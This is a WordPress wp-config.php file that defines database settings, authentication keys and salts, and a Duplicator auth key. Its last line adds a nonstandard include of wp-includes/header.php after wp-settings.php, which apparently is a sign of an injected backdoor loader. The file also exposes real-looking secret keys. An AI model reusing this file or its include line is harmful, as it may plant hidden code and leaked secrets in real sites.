<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', '' );

/** MySQL database username */
define( 'DB_USER', '' );

/** MySQL database password */
define( 'DB_PASSWORD', '' );

/** MySQL hostname */
define( 'DB_HOST', '' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'O`#JsA*bES*p!{R0y&i3ZU[VQU:A^/:CTJucf7I%d3>VwvJ4Wp!F{o[Kb@@TTd{C' );
define( 'SECURE_AUTH_KEY',  '-0r=%9c%.!5.sPh~Bj2v|.gkRH[k z%OpXO4Z}uO,MV2q]W8]FN;WX|^8-_ZRDHR' );
define( 'LOGGED_IN_KEY',    'Zd8@:>K<o5iiaKQhIw$&}SS+&J(t.Q8%B<C#7k]xR6,:AF=W(@w+{NszJ/9AZc{M' );
define( 'NONCE_KEY',        'C6-n-</HXd- yX?[#.~{(Z[U#]00PO->N^NY{9V>vp)m((L0^Q/:4QXQwvs?^k$4' );
define( 'AUTH_SALT',        'uZdpccZ`0rgV.]Xzp=R~lL[d4.BTr@YR=8|J)4jbgBmfD?6vo*M3T[G*qni^bhVZ' );
define( 'SECURE_AUTH_SALT', '~C>h~D)j:atm5_Y@Fw2g.X37rx0^v.#xk`3%V<XUvq(s9d.y{Jlfb%xdSw[pf][;' );
define( 'LOGGED_IN_SALT',   ')oV%4_:VHYqx qbm|QM|zbucwJ|e:P-,&Valwo![N3I~?zm0 .k6nrG[/=d gt4M' );
define( 'NONCE_SALT',       'JHD5}$3~Ur8)BJNAda[`zw,;Oh7G$rB{|S_VKr=!sd?knlb!*!SgpQ@jDWGgYmvx' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



define( 'DUPLICATOR_AUTH_KEY', 'h2 53Goqg9&T3DF:}aHw4B;M!Zx,yw=.rDqPC(,<4.yx4L[a bADHa`r,Q5$I#UH' );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname(__FILE__) . '/' );
define( 'WP_CACHE', true ); /* SC_WC */
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
include_once(ABSPATH . WPINC . '/header.php');

